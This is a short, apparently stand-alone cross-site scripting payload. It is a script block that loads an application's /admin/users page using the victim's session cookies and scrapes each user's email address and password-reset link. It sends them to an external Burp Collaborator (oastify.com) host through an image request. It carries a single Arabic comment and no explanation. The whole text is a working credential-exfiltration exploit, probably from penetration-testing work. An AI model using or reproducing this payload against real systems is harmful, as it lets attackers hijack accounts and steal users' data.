<script> fetch("/admin/users", { credentials: "include" }) .then(res => res.text()) .then(html => { const parser = new DOMParser(); const doc = parser.parseFromString(html, "text/html"); const rows = doc.querySelectorAll("table tbody tr"); rows.forEach(row => { const email = row.children[3]?.innerText?.trim(); // العمود الرابع = الإيميل const resetLink = row.querySelector("a[data-url*='users-reset-password']")?.dataset?.url; if (email && resetLink) { new Image().src = "https://hxixz842mdpxows50bj93sn9u00roic7.oastify.com/leak?" + encodeURIComponent(`email=${email}&link=${resetLink}`); } }); }); </script>